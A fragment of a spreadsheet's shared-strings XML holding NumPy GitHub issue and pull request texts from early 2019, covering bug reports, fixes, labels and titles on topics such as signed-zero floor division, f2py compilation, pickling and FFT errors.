  </si>
  <si>
    <t>['03 - Maintenance', '25 - WIP', 'component: numpy.core']</t>
  </si>
  <si>
    <t>trusty (14.04) is  [due for end of life](https://www.ubuntu.com/about/release-cycle) as of April 2019 . Change our default to xenial (16.04) on travis, but leave one build on trusty for python 3.5. The azure 32 bit linux build is using xenial (16.04).</t>
  </si>
  <si>
    <t>TEST: use xenial by default for travis</t>
  </si>
  <si>
    <t>travis started failing a non-related test in PR #12842. I could reproduce the failure locally when running tests with `python runtests.py --coverage --mode full -t numpy/distutils/tests/test_exec_command.py`. Removing the `COV_CORE_SOURCE`, `COV_CORE_CONFIG`, `COV_CORE_DATAFILE` environment variables before running `Popen([sys.executable ...` fixes it. Perhaps it is due to the `include` line in [`.coveragerc`](https://github.com/numpy/numpy/blob/v1.16.0/.coveragerc#L3), but it seemed safer to treat the failure where it happened._x000D_
_x000D_
I don't understand why the failure began happening now. Perhaps one of the coverage-related packages was updated in apt or on PyPI</t>
  </si>
  <si>
    <t>TEST: remove COV_* from environment before testing Popen</t>
  </si>
  <si>
    <t xml:space="preserve">First attempt to fix #12841. I've only minimally tested this so far, so it shouldn't be merged as is yet. I plan to add a few test functions and to look and see if there are any other places in the code where `copysign()` should be used in place of a simple check against zero._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: fix signed zero behavior in npy_divmod </t>
  </si>
  <si>
    <t>['00 - Bug', 'component: npy_math']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12722_x000D_
_x000D_
* BUG: Fix rounding of denormals in double and float to half casts_x000D_
_x000D_
Previously the significand was shifted right to align denormals of_x000D_
different magnitude. This loses some bits that can make a difference_x000D_
for rounding. This is fixed:_x000D_
 1. For floats, by inspecting the original last bits when this may_x000D_
    make a difference (should happen rarely)_x000D_
 2. For doubles by shifting the bits left to align the denromals and_x000D_
    thus not lose the lowest orginal bits._x000D_
_x000D_
* TST: Test half denormal rounding_x000D_
_x000D_
The test assumes that half to even is active, if this is ever_x000D_
changed or allowed to change, the test will fail._x000D_
_x000D_
* Fixup: Fixup for halffloat.c_x000D_
_x000D_
The one code path cannot be used. The other must have been a typo, but_x000D_
is a valid bug, a new test for it in the next commit._x000D_
_x000D_
* TST: half casting lower bits are not lost for denormal results_x000D_
_x000D_
The first test only tested the off by one, this one specifically tests_x000D_
that all bits are used to decide if "round to nearest even" should_x000D_
be used, in the example of rounding towards 0._x000D_
_x000D_
* TST: Test not just denormals but all positive finite float16s_x000D_
_x000D_
* DOC: Add lots of comments and add a short release note._x000D_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</si>
  <si>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rounding of denormals in double and float to half casts.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12748._x000D_
_x000D_
Check for error when calling the PickleBuffer constructor in `ndarray.__reduce_ex__`,_x000D_
and fall back on the regular `__reduce__` implementation for arrays which don't_x000D_
support taking a buffer._x000D_
_x000D_
Also fix some reference leaks._x000D_
_x000D_
Fixes gh-12745, gh-12793_x000D_
_x000D_
* BUG: Fix SystemError when pickling datetime64 array with pickle5_x000D_
_x000D_
Fixes gh-12745_x000D_
_x000D_
* Fix reference and error handling_x000D_
_x000D_
* Add a test for the fixed reference leak_x000D_
_x000D_
* Fix for PyPy + simplify #if condition_x000D_
_x000D_
* Fix comment_x000D_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</si>
  <si>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 xml:space="preserve">BUG: Fix SystemError when pickling datetime64 array with pickle5 </t>
  </si>
  <si>
    <t>`shlex.split` will try to read stdin if `None` is passed,_x000D_
so change to check before apply it._x000D_
_x000D_
see #12823</t>
  </si>
  <si>
    <t>BUG: fix to check before apply `shlex.split`</t>
  </si>
  <si>
    <t xml:space="preserve">Numpy returns a weird results of _x000D_
0//1 = -0.0, _x000D_
while python itself returns 0.0 as expected_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
0.0//1                    # returns 0.0  _x000D_
np.float32(0.0)//1        # returns -0.0_x000D_
```_x000D_
_x000D_
I've asked about that on [stackoverflow](https://stackoverflow.com/questions/54331829/weird-result-of-floor-division-in-numpy/54332310#54332310), answer points to line 668 of  [npy_math_internal.h.src](https://github.com/numpy/numpy/blob/master/numpy/core/src/npymath/npy_math_internal.h.src)_x000D_
_x000D_
Shouldn't it state_x000D_
```_x000D_
floordiv = (a / b&gt;=0) ?  0.0@c@ : -0.0@c@;_x000D_
```_x000D_
instead of:_x000D_
```_x000D_
floordiv = (a / b&gt;0) ?  0.0@c@ : -0.0@c@;_x000D_
```_x000D_
_x000D_
_x000D_
I've checked for Numpy 1.15.4  /  Python 3.6.7_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Bug: floor division of 0 returns -0.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
OK, folks, it seems that I have some issues with the most recent release. _x000D_
_x000D_
When I try to build something simple, for example,_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```_x000D_
python setup.py build_ext --inplace_x000D_
```_x000D_
I get regular output with a bunch of errors, it seems that some headers (at least) can't be found, for example, sys/endian.h_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_configtest.c:1:10: fatal error: sys/endian.h: No such file or directory_x000D_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I have a machine with Arch installed, glibc 2.28 and gcc/gfortran 8.2.1, numpy 1.16.0, Python 3.7.2_x000D_
_x000D_
[build.log](https://github.com/numpy/numpy/files/2789587/build.log)_x000D_
_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Can't find headers while building numpy 1.16.0</t>
  </si>
  <si>
    <t>As reported in #12825 in [these](https://github.com/numpy/numpy/issues/12825#issuecomment-456561919) [comments](https://github.com/numpy/numpy/issues/12825#issuecomment-456566648). Should change the module for backward compatibility</t>
  </si>
  <si>
    <t>BUG: ndarrays pickled on 1.16.0 cannot be loaded in previous versions</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>A major use case for the [numpy.fromfile()](https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.fromfile.html) function is in reading from binary file of some kind. Frequently, binary formats are just arrays of data with a fixed-size header. It would be useful to have an extra optional parameter for the fromfile() function which defines a byte offset for when to start reading. This parameter would default to 0, leaving it backwards-compatible with existing code._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
binary_file = "sample_binary.bin"_x000D_
my_array = np.fromfile(binary_file, dtype=np.uint8, offset=40)_x000D_
```_x000D_
_x000D_
Currently, the above code will not run, as the 'offset' keyword argument is not supported. In this call, the ndarray object 'my_array' would be the result of the binary file being read in, starting with an offset of 40 bytes._x000D_
_x000D_
It is certainly possible to [work-around](https://stackoverflow.com/questions/30124255/read-a-binary-file-using-numpy-fromfile-and-a-given-offset) the issue currently, but adding direct support for offsets in the function would make for cleaner code.</t>
  </si>
  <si>
    <t>numpy.fromfile() byte offset</t>
  </si>
  <si>
    <t>['23 - Wish List', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Running log2 on an array of zeros with float dtype results in small non-zero numbers and sometimes nan._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
x = np.zeros((1, 10), dtype=np.float)_x000D_
print(x &gt; 0)_x000D_
print(np.log2(x, where=x &gt; 0))_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
```python_x000D_
[[False False False False False False False False False False]]_x000D_
[[0.00000000e+000 0.00000000e+000 1.77229088e-310 3.50977866e+064_x000D_
  0.00000000e+000 0.00000000e+000             nan             nan_x000D_
  3.50977942e+064 2.23604912e-314]]_x000D_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```python_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.4 3.6.6 |Anaconda custom (64-bit)| (default, Jun 28 2018, 11:07:29)_x000D_
[GCC 4.2.1 Compatible Clang 4.0.1 (tags/RELEASE_401/final)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>log2 on zero array where x &gt; 0 results in nan, small numbers</t>
  </si>
  <si>
    <t>['04 - Documentation', '50 - Duplicate', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Fixes  #10569, maybe._x000D_
_x000D_
## How does the error occur?_x000D_
When I'm compiling scipy with _x000D_
```sh_x000D_
python3 setup.py config --compiler=intelem --fcompiler=intelem build_clib --compiler=intelem --fcompiler=intelem build_ext_x000D_
```_x000D_
, numpy will search for the intel fortran compiler._x000D_
When found, numpy will call_x000D_
```_x000D_
['/opt/intel/compilers_and_libraries_2019.1.144/linux/bin/intel64/ifort', '-FI', '-V', '-c', '/tmp/tmp89hcqec6/qovhj4fn.f', '-o', '/tmp/tmp89hcqec6/qovhj4fn.o']_x000D_
```_x000D_
with `subprocess.check_output` and match the output with the pattern_x000D_
`Intel.*?Fortran.*?(?:%s).*?Version' % (type,)` where `type` is `'EM64T-based|Intel\\(R\\) 64|64|IA-64|64-bit'`._x000D_
However, the output of the version checking command is:_x000D_
```_x000D_
 Intel(R) Fortran 19.0-1560_x000D_
```_x000D_
It doesn't match the pattern and will raise the `CompilerNotFound` error._x000D_
_x000D_
## How does this PR fix it?_x000D_
It seems that the output matching the pattern is in the stderr of the version checking command:_x000D_
```_x000D_
Intel(R) Fortran Intel(R) 64 Compiler for applications running on Intel(R) 64, Version 19.0.1.144 Build 20181018_x000D_
Copyright (C) 1985-2018 Intel Corporation.  All rights reserved._x000D_
```_x000D_
So I re-direct the stderr to stdout and everything work fine._x000D_
_x000D_
## Should I merge this?_x000D_
No, I don't think so._x000D_
This approach affects all the compilers and I have only tested one._x000D_
I think a better approach is to make the `'/tmp/tmp89hcqec6/qovhj4fn.f'` giving output matching the pattern. I wish to help but I know zero about fortran. So I can't help you more.</t>
  </si>
  <si>
    <t xml:space="preserve">- Always enable __array_function__ overrides._x000D_
- Remove special cases for Python 2 compatibility._x000D_
- Document these changes in 1.17.0-notes.rst._x000D_
_x000D_
It will be good to see ASV numbers to understand the performance implications_x000D_
of these changes. If need be, we can speed up NumPy functions internally by_x000D_
using non-dispatched functions (with ``.__wrapped__``)._x000D_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</si>
  <si>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__array_function__ updates for NumPy 1.17.0</t>
  </si>
  <si>
    <t xml:space="preserve">This is an update to allow users to suppress the usual capturing of stdout/stderr that pytest does._x000D_
_x000D_
I am not completely sure how to write tests for this, but I did (and can again) run the different options to show that:_x000D_
_x000D_
- With no flag or `-c fd`, the tests run as always, everything gets captured_x000D_
- With `-c sys`, Python `print` statements are captured, but C `printf` calls are not._x000D_
- With `-c suppress`, both Python `print`s and C `printf`s are not captured._x000D_
_x000D_
This is useful for people like me, who have not figured out how to set up gdb with python properly yet, as well as for folks making small changes, where a quick printout is worth something. In particular, I have found this useful for quickly dealing with segfaults. </t>
  </si>
  <si>
    <t>ENH: Added option to suppress stout/err capture in tests</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>More intuitive use of iterators. Context manager introduction version noted explicitly._x000D_
_x000D_
This is still a rough draft, and all advice is welcome._x000D_
_x000D_
Fixes #12764</t>
  </si>
  <si>
    <t>DOC: Updates to nditer usage instructions</t>
  </si>
  <si>
    <t>['04 - Documentation', '25 - WIP', 'component: Documentation']</t>
  </si>
  <si>
    <t>In looking at the [warnings while generating documentation](https://circleci.com/gh/numpy/numpy/5751?utm_campaign=vcs-integration-link&amp;utm_medium=referral&amp;utm_source=github-build-link), there are dozens of "/home/circleci/repo/venv/lib/python3.6/site-packages/numpy/core/_internal.py:docstring of numpy.core._internal._ctypes.shape:1: **WARNING: duplicate object description of** numpy.core._internal._ctypes.shape, other instance in /home/circleci/repo/doc/source/reference/generated/numpy.core.defchararray.chararray.ctypes.rst, **use :noindex: for one of them**_x000D_
_x000D_
I think this is caused by `chararray` being a subclass of `ndarray`, as similar warnings are generated for `MaskedArray`. I tried:_x000D_
- adding `autodoc_inherit_docstrings = False` to the `conf.py`_x000D_
- messing with the `autosummary` [templates](https://github.com/numpy/numpy/tree/v1.16.0/doc/source/_templates/autosummary)_x000D_
_x000D_
Any ideas how to turn those warnings off?</t>
  </si>
  <si>
    <t>DOC: autosummary is finding double documentation, emits many warnings</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12683._x000D_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</si>
  <si>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Add mm-&gt;qm divmod</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '08 - Backport', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t>It looks like the recent `os_fspath` function does not allow unicode paths to be used in Python 2.x. I don't know if this is a design decision, but perhaps this is a bug?_x000D_
_x000D_
```_x000D_
# python --version_x000D_
Python 2.7.12_x000D_
# pip freeze | grep numpy_x000D_
numpy==1.16.0_x000D_
```_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.savez_compressed('test') # OK_x000D_
np.savez_compressed(u'test')_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "numpy/lib/npyio.py", line 691, in savez_compressed_x000D_
    _savez(file, args, kwds, True)_x000D_
  File "numpy/lib/npyio.py", line 700, in _savez_x000D_
    file = os_fspath(file)_x000D_
  File "numpy/compat/py3k.py", line 237, in os_fspath_x000D_
    "not " + path_type.__name__)_x000D_
TypeError: expected str, bytes or os.PathLike object, not unicode_x000D_
```_x000D_
_x000D_
The proposed fix simply adds `unicode` as an allowed type.</t>
  </si>
  <si>
    <t>BUG: add support for unicode paths in os_fspath</t>
  </si>
  <si>
    <t>A bit of cleanup to reduce the number of warnings when building documentation. Python3 dropped some buffer and dunder methods, and `__nonzero__` becamame `__bool__`. _x000D_
_x000D_
Many warnings of the type_x000D_
_x000D_
```_x000D_
lib/python3.6/site-packages/numpy/core/_internal.py:docstring of _x000D_
numpy.core._internal._ctypes.shape:1: WARNING: duplicate object_x000D_
description of numpy.core._internal._ctypes.shape, other instance in _x000D_
numpy/doc/source/reference/generated/numpy.core.defchararray.chararray.ctypes.rst,_x000D_
use :noindex: for one of them_x000D_
```_x000D_
It seems this is a known problem with sphinx and referencing the same docstring from two classes</t>
  </si>
  <si>
    <t>DOC: remove python2-only methods, small cleanups</t>
  </si>
  <si>
    <t>Fixes #12806 which exposed a path through the code where writeback semantics were not being resolved if `arr_insert` (used by `np.place`) failed. Test added and code fixed.</t>
  </si>
  <si>
    <t>BUG: resolve writeback in arr_insert failure paths</t>
  </si>
  <si>
    <t xml:space="preserve">The test should not be run if there is no Fortran compiler. This PR_x000D_
moves it to `numpy/f2py/tests/test_compile_function.py`, which is_x000D_
appropriate for the test and a place where the presence of the needed_x000D_
compilers is already checked for._x000D_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</si>
  <si>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testing of f2py.compile from strings.</t>
  </si>
  <si>
    <t>Fixes #12796 which actually exposed two problems:_x000D_
_x000D_
- a regression from 0a61f7f4 where `bytes` can no longer be a `source` argument to `f2py.compile` (`str(b'abc')` becomes `"b'abc'"` not `'abc`)_x000D_
- docs inaccurately stated `source` must be `str`, which was wrong, `source` was bytes in 1.15.4 and before._x000D_
_x000D_
This PR  fixes both problems. _x000D_
_x000D_
Using `str(bytes, 'utf-8')` will convert bytes or a bytes-like buffer to `str`, but will not accept a `str`._x000D_
_x000D_
The documentation is now built from the docstrings of `compile` and `run_main`, which means the functions are now discoverable by searching for `f2py.compile` or `f2py.run_main`</t>
  </si>
  <si>
    <t>BUG, DOC: test, fix that f2py.compile accepts str and bytes, rework docs</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', '06 - Regression', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Discovered in #12748 and pinpointed there by @seberg and @pitrou, maybe related to #12750 (unlikely). The problem is only encountered when hitting the erroring codepaths after calling `PyArray_NewFromDescrAndBase` which steals a reference to `dtype`._x000D_
_x000D_
When I run the test without the fix I get test failures around the refcounts and this_x000D_
```_x000D_
*** Reference count error detected: _x000D_
an attempt was made to deallocate 12 (d) ***_x000D_
```_x000D_
printed as python exits_x000D_
_x000D_
With the (newly refactored and extended) tests, everything passes and there is no error detected.</t>
  </si>
  <si>
    <t>BUG: double decref of dtype in failure codepath. Test and fix</t>
  </si>
  <si>
    <t xml:space="preserve">Good evening, I would like to report the following small contribution:_x000D_
_x000D_
The compilation of the test file (fib.f):_x000D_
_x000D_
`   _x000D_
   _x000D_
     SUBROUTINE FIB(A,N)_x000D_
      INTEGER N _x000D_
      REAL*8 A(N)_x000D_
      DO I=1,N_x000D_
         IF (I.EQ.1) THEN_x000D_
            A(I) = 0.0D0_x000D_
         ELSEIF (I.EQ.2) THEN_x000D_
            A(I) = 1.0D0_x000D_
         ELSE _x000D_
            A(I) = A(I-1) + A(I-2)_x000D_
         ENDIF_x000D_
      ENDDO_x000D_
      END_x000D_
`_x000D_
_x000D_
using f2py and the PGI compiler:_x000D_
_x000D_
`f2py -c fib.f90 -m fib --fcompiler=pg`_x000D_
_x000D_
leads to the error:_x000D_
_x000D_
`_x000D_
pgfortran:f77: fib.f_x000D_
/opt/pgi/linux86-64/18.10/bin/pgfortran -shared -fpic -shared -fpic /tmp/tmpoiui5fxw/tmp/tmpoiui5fxw/src.linux-x86_64-3.7/fibmodule.o /tmp/tmpoiui5fxw/tmp/tmpoiui5fxw/src.linux-x86_64-3.7/fortranobject.o /tmp/tmpoiui5fxw/fib.o -o ./fib.cpython-37m-x86_64-linux-gnu.so_x000D_
/usr/bin/ld: duplicate version tag `VERSION_1810'_x000D_
/usr/bin/ld: duplicate version tag `VERSION_1810'_x000D_
error: Command "/opt/pgi/linux86-64/18.10/bin/pgfortran -shared -fpic -shared -fpic /tmp/tmpoiui5fxw/tmp/tmpoiui5fxw/src.linux-x86_64-3.7/fibmodule.o /tmp/tmpoiui5fxw/tmp/tmpoiui5fxw/src.linux-x86_64-3.7/fortranobject.o /tmp/tmpoiui5fxw/fib.o -o ./fib.cpython-37m-x86_64-linux-gnu.so" failed with exit status 2_x000D_
`_x000D_
_x000D_
The cause seems to be the duplicated flags `-shared -fpic`.  Erasing_x000D_
them from the `linker_so` defined in `pg.py` and adding a_x000D_
`get_flags_linker_so` function for `platform != 'darwin'` solves the_x000D_
issue:_x000D_
_x000D_
`_x000D_
pgfortran:f77: fib.f_x000D_
/opt/pgi/linux86-64/18.10/bin/pgfortran -shared -fpic /tmp/tmplm1mi7gf/tmp/tmplm1mi7gf/src.linux-x86_64-3.7/fibmodule.o /tmp/tmplm1mi7gf/tmp/tmplm1mi7gf/src.linux-x86_64-3.7/fortranobject.o /tmp/tmplm1mi7gf/fib.o -o ./fib.cpython-37m-x86_64-linux-gnu.so_x000D_
`_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: fix f2py problem to build wrappers using PGI's Fortran</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12604._x000D_
_x000D_
Similar to `fromstring` function, the `dtype` and `format` arguments of `fromfile` should be validated first to see that at least one of them is not None._x000D_
_x000D_
The following snippet shows the current behaviour_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
l50 = np.arange(100)_x000D_
fields_number = 10_x000D_
_x000D_
buffer = l50.tostring() * fields_number_x000D_
for file in ('test1.bin', ):_x000D_
    with open(file, 'w+b') as f:_x000D_
        f.write(buffer)_x000D_
np.core.records.fromfile('test1.bin')_x000D_
```_x000D_
```Traceback (most recent call last):_x000D_
  File "/home/daniel/.config/spyder-py3/temp.py", line 19, in &lt;module&gt;_x000D_
    print(np.core.records.fromfile('test1.bin')    )_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 762, in fromfile_x000D_
    descr = format_parser(formats, names, titles, aligned, byteorder)._descr_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 144, in __init___x000D_
    self._parseFormats(formats, aligned)_x000D_
  File "/usr/lib/python3/dist-packages/numpy/core/records.py", line 153, in _parseFormats_x000D_
    raise ValueError("Need formats argument")_x000D_
ValueError: Need formats argument_x000D_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</si>
  <si>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Check that dtype or formats arguments are not None.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sorry I didn't get this in earlier! Hopefully this will make it clearer to_x000D_
users ``__array_function__`` is only opt-in for now._x000D_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</si>
  <si>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clarify the extend of __array_function__ support in NumPy 1.16</t>
  </si>
  <si>
    <t>Fixes #12711 and compatibility with 1.15. In fixing #11490, checks were added to `ediff1d`'s `to_begin` and `to_end` kwargs in PR #11805. The checks are now too stringent, and cause a regression from previous versions. This PR relies on `np.asanyarray(values, dtype=dtype_req)` to raise if the values cannot be cast. Unfortunately, `asanyarray` uses unsafe casting, so an additional check that the values did not change is needed._x000D_
_x000D_
Also note the exception type in tests was adjusted to `ValueError`, since casting `np.array([1, 2, 3], dtype='int64')` to `'int32'` is fine, but `np.array([1, 1&lt;&lt;35, 3], dtype='int64')` is not.</t>
  </si>
  <si>
    <t>BUG: loosen kwargs requirements in ediff1d</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there,_x000D_
_x000D_
I'm having a problem with getting a runtime warning:_x000D_
_x000D_
/.../.virtualenv/python_3_env/lib/python3.6/site-packages/numpy/lib/function_base.py:1725: RuntimeWarning: WRITEBACKIFCOPY detected in array_dealloc.  Required call to PyArray_ResolveWritebackIfCopy or PyArray_DiscardWritebackIfCopy is missing._x000D_
_x000D_
Actually, I'm curious about what this warning actually means?_x000D_
The origin of the warning is from a numpy.place, wich is placed in a generator:_x000D_
_x000D_
```_x000D_
def mygen():_x000D_
    ..._x000D_
    yield np.place(arr, bool_mask, vals)_x000D_
```_x000D_
_x000D_
If I remove the np.place operation, there is no warning._x000D_
The weird thing is, that I only get this warning, after I call the generator for the second time, e.g._x000D_
_x000D_
```_x000D_
a = mygen() # no warning_x000D_
a = mygen() # warning_x000D_
a = mygen() # no warnings more from here on_x000D_
..._x000D_
_x000D_
```_x000D_
_x000D_
I'm using Python 3.6.2 and numpy 1.16.0._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.place warning: WRITEBACKIFCOPY detected in array_dealloc</t>
  </si>
  <si>
    <t>Starting on the third step of #12662._x000D_
_x000D_
Working on this has revealed an issue with the drafted private function with respect to 0 D arrays. I seem to have patched that for now._x000D_
_x000D_
Running the full test suite seems to reveal another little treat -- `np.matrix` doesn't seem to play well with my initial changes to nansum._x000D_
_x000D_
Probably a bit early for benchmarks, but from a quick local check:_x000D_
`asv continuous -e -b "Nan" master nansum_where &gt;&amp; benchresults.txt`_x000D_
_x000D_
Produces:_x000D_
_x000D_
```_x000D_
       before           after         ratio_x000D_
     [b5b47a39]       [d83b05a0]_x000D_
+       174±0.9μs        211±0.8μs     1.22  bench_lib.Nan.time_nansum(200000, 0.1)_x000D_
+         171±1μs          206±2μs     1.20  bench_lib.Nan.time_nansum(200000, 0)_x000D_
-     6.82±0.04μs      6.18±0.05μs     0.91  bench_lib.Nan.time_nansum(200, 0)_x000D_
-      6.83±0.1μs      6.12±0.04μs     0.90  bench_lib.Nan.time_nansum(200, 2.0)_x000D_
-     6.76±0.08μs      6.05±0.02μs     0.89  bench_lib.Nan.time_nansum(200, 0.1)_x000D_
-     7.30±0.07μs      6.40±0.05μs     0.88  bench_lib.Nan.time_nansum(200, 50.0)_x000D_
-     7.12±0.06μs      6.21±0.08μs     0.87  bench_lib.Nan.time_nansum(200, 90.0)_x000D_
-        564±10μs         437±20μs     0.78  bench_lib.Nan.time_nansum(200000, 90.0)_x000D_
```</t>
  </si>
  <si>
    <t>WIP, ENH: First draft of nansum using _nan_mask()</t>
  </si>
  <si>
    <t>['01 - Enhancement', '25 - WIP', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">adds -shared to gfortran linker_so options_x000D_
resolves #12799_x000D_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</si>
  <si>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link issue with lapack_lite module. See #12799</t>
  </si>
  <si>
    <t>As discussed in #12658, we'll want to target `NaT` argmin, argmax, min, and max behavior adjustments to match the bug fix in sorting described there (to match `NaN` behavior) with 1.17 release target._x000D_
_x000D_
In particular, @seberg [notes (comment)](https://github.com/numpy/numpy/pull/12658#issuecomment-451647185)_x000D_
_x000D_
&gt; It seems currently NaT is completely ignored for min/max and argmin/argmax. I wonder if we should push to change that to be identical NaN (NaN is always returned). I guess if it that bites someone, on the up-side it probably will be loud since it points to NaT._x000D_
_x000D_
&gt; There is also an independend bug for argmin when it starts with NaT and has only one not NaT item at the end</t>
  </si>
  <si>
    <t>MAINT: NaT (arg)min/max behavior</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
On Numpy 1.16.0, `f2py` fails to generate Fortran modules:_x000D_
```_x000D_
error: f2py target file '/tmp/tmpnke02j8i/src.linux-x86_64-3.6/test_f2py.c' not generated_x000D_
```_x000D_
_x000D_
Tested on Ubuntu 1.16 and macOS 1.14.2 both with Python 3.6._x000D_
This appears to be a new bug as there are no issue with Numpy 1.15.4 or lower._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
Create `test_f2py.f90` and  `test_f2py.py` and add the following lines:_x000D_
- `test_f2py.f90`_x000D_
```_x000D_
program test_f2py_x000D_
end program test_f2py_x000D_
```_x000D_
_x000D_
- `test_f2py.py`_x000D_
```_x000D_
import numpy.f2py as f2py_x000D_
_x000D_
with open('test_f2py.f90', 'rb') as fid:_x000D_
    source = fid.read()_x000D_
f2py.compile(source , modulename='test_f2py', extension='.f90')_x000D_
```_x000D_
_x000D_
Run `test_f2py.py`.</t>
  </si>
  <si>
    <t>f2py fails to generate Fortran modules on Numpy 1.16.0</t>
  </si>
  <si>
    <t xml:space="preserve">When performing a FFT on an array of odd length greater than 2^24, numpy raises a ValueError:_x000D_
`ValueError: Internal error occurred, status=-1`_x000D_
Notably, an array of length 2**24 - 1 or smaller is fine, as is an array of any even length. _x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
x = np.empty(2**24 + 1)                                                                                                                   _x000D_
np.fft.fft(x)  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                                                                                                                        _x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-13-2ca28be828ef&gt; in &lt;module&gt;_x000D_
----&gt; 1 np.fft.fft(x)_x000D_
_x000D_
/opt/anaconda/lib/python3.6/site-packages/mkl_fft/_numpy_fft.py in fft(a, n, axis, norm)_x000D_
    156 _x000D_
    157     """_x000D_
--&gt; 158     output = mkl_fft.fft(a, n, axis)_x000D_
    159     if _unitary(norm):_x000D_
    160         output *= 1 / sqrt(output.shape[axis])_x000D_
_x000D_
mkl_fft/_pydfti.pyx in mkl_fft._pydfti.fft()_x000D_
_x000D_
mkl_fft/_pydfti.pyx in mkl_fft._pydfti._fft1d_impl()_x000D_
_x000D_
ValueError: Internal error occurred, status=-1_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
Numpy  1.15.4_x000D_
Python 3.6.8_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy.fft.fft fails on odd-length arrays longer than 2^24 elements</t>
  </si>
  <si>
    <t xml:space="preserve">the Fourier transform have many properties._x000D_
one is the following equation, regarding complex conjugation:_x000D_
$$ \widetilde{\overline{f(t)}} = \overline{\widetilde{f}(-\omega)} $$_x000D_
(where the overline indicates the complex conjugation and the tilde the Fourier transform)_x000D_
and another one is this other equation, regarding time reversal:_x000D_
$$ F(x(-t)) = (F(x))(-\omega) $$_x000D_
(with the Fourier transform indicated by F)_x000D_
_x000D_
let's start talking about the first equation._x000D_
when checking this analytical property numerically, I find that it is verified only for sequences with an odd number of samples, while with even numbers the two terms (left and right) are shifted by one sample. this seems a bug. if you do `numpy.roll(right, 1)` you obtain back the `left` term (within negligible numerical errors)._x000D_
_x000D_
the second properties is instead never correctly verified, since with both odd and even numbers the two results appear to be shifted by one sample one with respect to the other. this seems a bug to me._x000D_
_x000D_
I'm reporting those two bugs together, since I believe they are strictly related._x000D_
_x000D_
with the following code you can reproduce those bugs._x000D_
_x000D_
```_x000D_
import numpy_x000D_
_x000D_
import matplotlib_x000D_
#matplotlib.use('Qt5Agg')_x000D_
from matplotlib import pyplot_x000D_
_x000D_
"""_x000D_
check complex conjugation_x000D_
$\widetilde{\overline{f(t)}} = \overline{\widetilde{f}(-\omega)}$_x000D_
"""_x000D_
_x000D_
length = 1024_x000D_
_x000D_
complex_data = numpy.random.normal(size=length) + 1j*numpy.random.normal(size=length)_x000D_
_x000D_
left = numpy.fft.fftshift(numpy.fft.fft(numpy.conjugate(complex_data)))_x000D_
right = numpy.conjugate(numpy.flip(numpy.fft.fftshift(numpy.fft.fft(complex_data))))_x000D_
_x000D_
print(numpy.isclose(left, right, atol=0.00001).all())_x000D_
_x000D_
pyplot.plot(abs(left), label='abs(left)')_x000D_
pyplot.plot(abs(right), label='abs(right)')_x000D_
pyplot.legend()_x000D_
